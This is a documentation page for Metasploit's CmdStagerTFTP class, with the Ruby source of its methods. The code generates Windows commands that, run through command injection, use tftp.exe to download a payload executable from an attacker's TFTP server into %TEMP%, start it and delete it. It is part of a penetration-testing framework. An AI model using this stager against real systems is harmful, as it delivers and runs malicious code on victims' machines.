Class: Rex::Exploitation::CmdStagerTFTP

Inherits:
CmdStagerBase show all
Defined in:
lib/rex/exploitation/cmdstager/tftp.rb

Overview

This class provides the ability to create a sequence of commands from an executable. When this sequence is ran via command injection or a shell, the resulting exe will be written to disk and executed.

This particular version uses tftp.exe to download a binary from the specified server. The original file is preserved, not encoded at all, and so this version is significantly simpler than other methods.

Requires: tftp.exe, outbound udp connectivity to a tftp server

Written by Joshua J. Drake

Instance Attribute Summary collapse

Instance Method Summary collapse

Methods inherited from CmdStagerBase

#compress_commands, #encode_payload, #generate_cmds, #initialize, #parts_to_commands, #slice_up_payload

Constructor Details

This class inherits a constructor from Rex::Exploitation::CmdStagerBase

Instance Attribute Details

#exeObject (readonly)

Returns the value of attribute exe.



77
78
79
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 77

def exe
  @exe
end

#payload_exeObject (readonly)

Returns the value of attribute payload_exe.



78
79
80
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 78

def payload_exe
  @payload_exe
end

#tftpObject

Returns the value of attribute tftp.



79
80
81
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 79

def tftp
  @tftp
end

Instance Method Details

#cmd_concat_operatorObject 



73
74
75
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 73

def cmd_concat_operator
  ' & '
end

#generate(opts = {}) ⇒ Object 



27
28
29
30
31
32
33
34
35
36
37
38
39
40
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 27

def generate(opts = {})
  if opts[:tftphost].nil?
    raise "#{self.class.name}##{__callee__} missing opts[:tftphost]"
  end

  opts[:linemax] ||= @linemax
  opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
  opts[:temp] ||= '%TEMP%'

  @payload_exe = opts[:file]
  @payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}"

  generate_cmds(opts)
end

#generate_cmds_decoder(opts) ⇒ Object 



65
66
67
68
69
70
71
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 65

def generate_cmds_decoder(opts)
  cmds = []
  cmds << "start \"#{@payload_path}\""
  # NOTE: We can't delete the payload while it is running.
  cmds << "del \"#{@payload_path}\"" unless opts[:nodelete]
  cmds
end

#generate_cmds_payload(opts) ⇒ Object 



53
54
55
56
57
58
59
60
61
62
63
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 53

def generate_cmds_payload(opts)
  cmds = []
  # We can skip the destination argument if we're writing to the working directory,
  # as tftp defaults to writing the file to the current directory with the same filename.
  if opts[:file] == @payload_path
    cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}"
  else
    cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\""
  end
  cmds
end

#setup(mod) ⇒ Object 



42
43
44
45
46
47
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 42

def setup(mod)
  self.tftp = Rex::Proto::TFTP::Server.new
  self.tftp.register_file(@payload_exe, exe)
  self.tftp.start
  mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
end

#teardown(mod = nil) ⇒ Object 



49
50
51
 
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 49

def teardown(mod = nil)
  self.tftp.stop
end